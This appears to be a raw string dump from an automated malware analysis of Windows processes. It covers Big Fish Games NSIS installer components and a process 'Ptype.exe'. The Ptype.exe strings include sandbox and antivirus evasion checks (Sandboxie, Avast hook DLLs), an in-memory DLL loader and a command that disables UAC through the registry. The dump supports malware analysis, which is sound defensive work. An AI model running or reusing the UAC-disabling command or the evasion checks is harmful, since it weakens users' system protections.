%d%%</pre><pre>http://nsis.sf.net/NSIS_Error</pre><pre>~nsu.tmp</pre><pre>%u.%u%s%s</pre><pre>.DEFAULT\Control Panel\International</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>*?|<>/":</pre><pre>"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl8.tmp</pre><pre>inetc.dll</pre><pre>nning '%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe'</pre><pre>id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe</pre><pre>me_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce<id>493593</id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre><pre>:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa4.tmp\inetc.dll</pre><pre>><sender>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce</sender><id>493593</id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre>
<pre>Execute: "%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>bfgsetup_s1_l1.exe</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe</pre><pre>nts and Settings\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>tdown<transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre><pre>EID":"1", "STUB_SITEID":"1", "COUNTER":"0","UPGRADESOURCE":"DOWNLOAD", "VERSION_TO":"%VERSION_TO%", "VERSION_FROM":"0.0.0.0", "OSNAME":"XP", "OSVERSION":"5.1.2600.5512", "INSTALLATION_STATUS":"%INSTALLATION_STATUS%","ERROR_LEVEL":"%ERROR_LEVEL%"}</pre><pre>sion="1.0" encoding="utf-16" ?><bfg><message><sender>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce</sender><id>493593</id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers></message></bfg></pre><pre>7P9MT7EX72W..exe</pre><pre>1397743395</pre><pre>wnload, running '%Documents and Settings%\All Users\Application 
Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe'</pre><pre><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre><pre>FG_Monitor_f8c5f096-93d6-4f5f-8474-fc53d9c7540c</pre><pre>sage><sender>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce</sender><id>493593</id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></pre><pre>OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy6.tmp</pre><pre>><bfg><message><sender>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce</sender><id>493593</id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></message></bfg></pre><pre>bfggameservices.exe</pre><pre>?xml version="1.0" encoding="utf-16" ?><bfg><message><sender>BFG_Game_Installer_4e92f742-bf7f-4a3d-92aa-b0f69e31ccce</sender><id>493593</id><timestamp>493593</timestamp><context>Shutdown</context><transactionId></transactionId><receivers><receiver><id>BFG_DRM_71f48295-5ff7-4894-b2c3-92f72b83a864</id><ensureRunning>0</ensureRunning></receiver></receivers><params></params><isResponse>0</isResponse></message></bfg></pre><pre>"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp</pre><pre>%Documents and Settings%\All Users\Application 
Data\BigFishCache\Upgrade\stub</pre><pre>HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe</pre><pre>CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf3.tmp</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa4.tmp</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe</pre><pre>571081478</pre><pre>cceeded with download, running '%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe'</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache</pre><pre>{"IDENTIFIER":"0", "IDENTIFIER_TYPE":"DOWNLOADID", "CURRENT_SITEID":"", "CURRENT_LANGUAGEID":"", "STUB_LANGUAGEID":"1", "STUB_SITEID":"1", "COUNTER":"0","UPGRADESOURCE":"DOWNLOAD", "VERSION_TO":"%VERSION_TO%", "VERSION_FROM":"0.0.0.0", "OSNAME":"XP", "OSVERSION":"5.1.2600.5512", "INSTALLATION_STATUS":"%INSTALLATION_STATUS%","ERROR_LEVEL":"%ERROR_LEVEL%"}</pre><pre>{4CFDE078-C665-429D-9A80-1C8F5D0EF06D}</pre><pre>3.3.0.2</pre><pre>04090000</pre><b>Ptype.exe_1144:</b><pre>.idata</pre><pre>.rdata</pre><pre>P.reloc</pre><pre>P.rsrc</pre><pre>BuildImportTable: can't load library:</pre><pre>BuildImportTable: ReallocMemory failed</pre><pre>BuildImportTable: GetProcAddress failed</pre><pre>BTMemoryLoadLibary: BuildImportTable failed</pre><pre>BTMemoryGetProcAddress: no export table found</pre><pre>BTMemoryGetProcAddress: DLL doesn't export anything</pre><pre>BTMemoryGetProcAddress: exported symbol not found</pre><pre>kernel32.dll</pre><pre>76487-644-3177037-23510</pre><pre>55274-640-2673064-23950</pre><pre>sbiedll.dll</pre><pre>dbghelp.dll</pre><pre>RLHOOK32.DLL</pre><pre>snxhk.dll</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>ntdll.dll</pre><pre>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 
/f</pre><pre>%sysdir%\</pre><pre>%sysdir%</pre><pre>~a39.log</pre><pre>cmd_.bat</pre><pre>sevane.tmp</pre><pre>user32.dll</pre><pre>cmd.dll</pre><pre>~a21524.log</pre><pre>GetProcessHeap</pre><pre>oleaut32.dll</pre><pre>advapi32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyA</pre><pre>RegCloseKey</pre><pre>WinExec</pre><pre>GetWindowsDirectoryA</pre><pre>wsock32.dll</pre><pre>shell32.dll</pre><pre>ShellExecuteA</pre><pre>7'7 7/73777;7?7!8<8</pre><pre>KWindows</pre><pre>66006666</pre><b>bfgsetup_s1_l1.exe_1796:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.ndata</pre><pre>.rsrc</pre><pre>tDSSh</pre><pre>%s %s</pre><pre>... %d%%</pre><pre>verifying installer: %d%%</pre><pre>ADVAPI32.dll</pre><pre>~nsu.tmp\</pre><pre>shlwapi.dll</pre><pre>%u.%u%s%s</pre><pre>KERNEL32.dll</pre><pre>.DEFAULT\Control Panel\International</pre><pre>*?|<>/":</pre><pre>\wininit.ini</pre><pre>%s=%s</pre><pre>%Program Files%</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>GetWindowsDirectoryA</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>SHFileOperationA</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>RegDeleteKeyA</pre><pre>RegCloseKey</pre><pre>RegEnumKeyA</pre><pre>RegOpenKeyExA</pre><pre>RegCreateKeyExA</pre><pre>COMCTL32.dll</pre><pre>ole32.dll</pre><pre>VERSION.dll</pre><pre>Au_.exe</pre><pre>RichEd20.dll</pre><pre>"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /D=%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack</pre><pre>/STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>gsetup_s1_l1.exe</pre><pre>ALS~1\Temp\nsxA.tmp\System.dll</pre><pre>Thawte 
Certification1</pre><pre>http://ocsp.thawte.com0</pre><pre>.http://crl.thawte.com/ThawteTimestampingCA.crl0</pre><pre>http://ts-ocsp.ws.symantec.com07</pre><pre> http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<</pre><pre> http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(</pre><pre>2Terms of use at https://www.verisign.com/rpa (c)101.0,</pre><pre>/http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D</pre><pre>https://www.verisign.com/rpa0</pre><pre>http://ocsp.verisign.com0;</pre><pre>/http://csc3-2010-aia.verisign.com/CSC3-2010.cer0</pre><pre><VeriSign Class 3="3" Public Primary Certification Authority - G50><pre>https://www.verisign.com/cps0*</pre><pre>#http://logo.verisign.com/vslogo.gif04</pre><pre>#http://crl.verisign.com/pca3-g5.crl04</pre><pre>http://ocsp.verisign.com0</pre><pre><?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.46-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly></pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsxA.tmp</pre><pre>nsxA.tmp</pre><pre>TH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>%Documents and Settings%\All Users\Application 
Data\BigFishCache</pre><pre>d Settings\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe</pre><pre>"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>bfgsetup_s1_l1.exe</pre><pre>CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr9.tmp</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>4! # #%%$#</pre><pre>J(.Bu</pre><pre><?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v06-Dec-2010.cvs</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" 
/></application></compatibility></assembly></pre><pre>3.3.0.2</pre><pre>04090000</pre><pre>04070000</pre><b>bfgsetup_s1_l1.exe_552:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.ndata</pre><pre>.rsrc</pre><pre>RegDeleteKeyExW</pre><pre>Kernel32.DLL</pre><pre>PSAPI.DLL</pre><pre>%s=%s</pre><pre>GetWindowsDirectoryW</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>SHFileOperationW</pre><pre>ShellExecuteW</pre><pre>SHELL32.dll</pre><pre>RegDeleteKeyW</pre><pre>RegCloseKey</pre><pre>RegEnumKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegCreateKeyExW</pre><pre>ADVAPI32.dll</pre><pre>COMCTL32.dll</pre><pre>ole32.dll</pre><pre>VERSION.dll</pre><pre>7%0xO</pre><pre>u: %d/%d trang...Kh</pre><pre>m.&Back&Forward&ReloadReload no cache&Stop&Undo&RedoCu&t&Copy&Paste&DeleteSelect &all&Find...&Print...View Source...</pre><pre>%dHTML</pre><pre>&Back&Forward&ReloadReload no cache&Stop&Undo&RedoCu&t&Copy&Paste&DeleteSelect &all&Find...&Print...View Source...</pre><pre>.reloc</pre><pre>8)u%f</pre><pre>AccessControl.dll</pre><pre>ClearOnRegKey</pre><pre>DenyOnRegKey</pre><pre>DisableRegKeyInheritance</pre><pre>EnableRegKeyInheritance</pre><pre>GetRegKeyGroup</pre><pre>GetRegKeyOwner</pre><pre>GrantOnRegKey</pre><pre>RevokeOnRegKey</pre><pre>SetOnRegKey</pre><pre>SetRegKeyGroup</pre><pre>SetRegKeyOwner</pre><pre>.text1</pre><pre>.adata</pre><pre>.data1</pre><pre>.pdata</pre><pre>4! 
# #%%$#</pre><pre>J(.Bu</pre><pre><?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.46-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly></pre><pre>verifying installer: %d%%</pre><pre>unpacking data: %d%%</pre><pre>... %d%%</pre><pre>http://nsis.sf.net/NSIS_Error</pre><pre>~nsu.tmp</pre><pre>%u.%u%s%s</pre><pre>.DEFAULT\Control Panel\International</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>*?|<>/":</pre><pre>ent.exe</pre><pre>OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscD.tmp\System.dll</pre><pre>ol.dll</pre><pre>og\gamemanager_install_log.txt</pre><pre>scD.tmp</pre><pre>OCALS~1\Temp\nscD.tmp\System.dll</pre><pre>er.bmp</pre><pre>EnumerateSubKeys</pre><pre>CreateSubKey</pre><pre>GenericExecute</pre><pre>Cannot apply new access control list. Error code: %d</pre><pre>Cannot build new access control list. Error code: %d</pre><pre>Cannot read access control list. 
Error code: %d</pre><pre>Bad permission flags (%s)</pre><pre>Bad trustee (%s)</pre><pre>Cannot change access control list inheritance. Error code: %d</pre><pre>Cannot apply new ownership. Error code: %d</pre><pre>Cannot open process token. Error code: %d</pre><pre>Bug: Unsupported change mode: %d</pre><pre>Cannot look up owner. Error code: %d</pre><pre>Cannot get current ownership. Error code: %d</pre><pre>Root key name missing</pre><pre>Registry key name missing</pre><pre>Bad root key name (%s)</pre><pre>Couldn't lookup current user name. Error code %d:</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscD.tmp</pre><pre>nscD.tmp</pre><pre>\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>d Settings\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache</pre><pre>"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack</pre><pre>%Program Files%\bfgclient</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller</pre><pre>bfgsetup_s1_l1.exe</pre><pre>CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsxB.tmp</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>%Documents and Settings%\All Users\Application 
Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe</pre><pre>1510605463</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe</pre><pre>3.3.0.2</pre><pre>04090000</pre><b>Ptype.exe_1144_rwx_13140000_00011000:</b><pre>.idata</pre><pre>.rdata</pre><pre>P.reloc</pre><pre>P.rsrc</pre><pre>BuildImportTable: can't load library:</pre><pre>BuildImportTable: ReallocMemory failed</pre><pre>BuildImportTable: GetProcAddress failed</pre><pre>BTMemoryLoadLibary: BuildImportTable failed</pre><pre>BTMemoryGetProcAddress: no export table found</pre><pre>BTMemoryGetProcAddress: DLL doesn't export anything</pre><pre>BTMemoryGetProcAddress: exported symbol not found</pre><pre>kernel32.dll</pre><pre>76487-644-3177037-23510</pre><pre>55274-640-2673064-23950</pre><pre>sbiedll.dll</pre><pre>dbghelp.dll</pre><pre>RLHOOK32.DLL</pre><pre>snxhk.dll</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>ntdll.dll</pre><pre>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f</pre><pre>%sysdir%\</pre><pre>%sysdir%</pre><pre>~a39.log</pre><pre>cmd_.bat</pre><pre>sevane.tmp</pre><pre>user32.dll</pre><pre>cmd.dll</pre><pre>~a21524.log</pre><pre>GetProcessHeap</pre><pre>oleaut32.dll</pre><pre>advapi32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyA</pre><pre>RegCloseKey</pre><pre>WinExec</pre><pre>GetWindowsDirectoryA</pre><pre>wsock32.dll</pre><pre>shell32.dll</pre><pre>ShellExecuteA</pre><pre>7'7 7/73777;7?7!8<8</pre><pre>KWindows</pre><pre>66006666</pre></VeriSign></pre></pre></VeriSign></pre>